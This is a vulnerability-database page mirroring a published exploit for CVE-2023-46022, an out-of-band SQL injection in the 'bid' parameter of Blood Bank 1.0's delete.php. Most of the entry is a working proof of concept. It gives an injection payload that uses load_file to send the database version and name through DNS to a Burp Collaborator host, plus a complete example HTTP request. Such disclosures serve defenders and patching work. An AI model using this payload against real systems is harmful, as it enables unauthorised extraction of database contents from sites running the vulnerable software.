Lucene search
K
Database
Vendors
Products
Years
CVSS
Scanner
Agent Scanning
API Scanning
Manual Audit
Perimeter Scanner
Scanning
Projects
Email
Webhook
Plugins
Resources
Documents
Blog
Glossary
FAQ
Pricing
Contacts
About Us
Partners
Branding Guideline
packetstormErsin ErenlerPACKETSTORM:177676
HistoryMar 20, 2024 - 12:00 a.m.

Blood Bank 1.0 SQL Injection

2024-03-2000:00:00
Ersin Erenler
packetstormsecurity.com
158
sql injection
vulnerability
out-of-band
burp collaborator
attack
sensitive information
blood bank 1.0
code-projects
cve-2023-46022

7.4 High

AI Score

Confidence

Low

0.001 Low

EPSS

Percentile

20.9%

JSON
`# Exploit Title: Blood Bank 1.0 - 'bid' SQLi  
# Date: 2023-11-15  
# Exploit Author: Ersin Erenler  
# Vendor Homepage: https://code-projects.org/blood-bank-in-php-with-source-code  
# Software Link: https://download-media.code-projects.org/2020/11/Blood_Bank_In_PHP_With_Source_code.zip  
# Version: 1.0  
# Tested on: Windows/Linux, Apache 2.4.54, PHP 8.2.0  
# CVE : CVE-2023-46022  
  
-------------------------------------------------------------------------------  
  
# Description:  
  
The 'bid' parameter in the /delete.php file of Code-Projects Blood Bank V1.0 is susceptible to Out-of-Band SQL Injection. This vulnerability stems from inadequate protection mechanisms, allowing attackers to exploit the parameter using Burp Collaborator to initiate OOB SQL injection attacks. Through this technique, an attacker can potentially extract sensitive information from the databases.  
  
Vulnerable File: /delete.php  
  
Parameter Name: bid  
  
# Proof of Concept:  
----------------------  
  
1. Intercept the request to cancel.php via Burp Suite  
2. Inject the payload to the vulnerable parameters  
3. Payload: 3'%2b(select%20load_file(concat('\\\\',version(),'.',database(),'.collaborator-domain\\a.txt')))%2b'  
4. Example request for bid parameter:  
---  
  
GET /bloodbank/file/delete.php?bid=3'%2b(select%20load_file(concat('\\\\',version(),'.',database(),'.domain.oastify.com\\a.txt')))%2b' HTTP/1.1  
Host: localhost  
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/119.0  
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8  
Accept-Language: en-US,en;q=0.5  
Accept-Encoding: gzip, deflate, br  
Connection: close  
Referer: http://localhost/bloodbank/bloodinfo.php  
Cookie: PHPSESSID=<some-cookie-value>  
Upgrade-Insecure-Requests: 1  
Sec-Fetch-Dest: document  
Sec-Fetch-Mode: navigate  
Sec-Fetch-Site: same-origin  
Sec-Fetch-User: ?1  
  
---  
5. Database and version information is seized via Burp Suite Collaborator  
  
`

Related

nvd 1
cve 1
prion 1
cvelist 1
exploitdb 1
nvd
nvd
CVE-2023-46022
2023-11-14 22:15:30
cve
cve
CVE-2023-46022
2023-11-14 22:15:30
prion
prion
Sql injection
2023-11-14 22:15:00
cvelist
cvelist
CVE-2023-46022
2023-11-14 00:00:00
exploitdb
exploitdb
Blood Bank 1.0 - &#039;bid&#039; SQLi
2024-03-20 00:00:00

7.4 High

AI Score

Confidence

Low

0.001 Low

EPSS

Percentile

20.9%

JSON
Related for PACKETSTORM:177676
nvd1cve1prion1cvelist1exploitdb1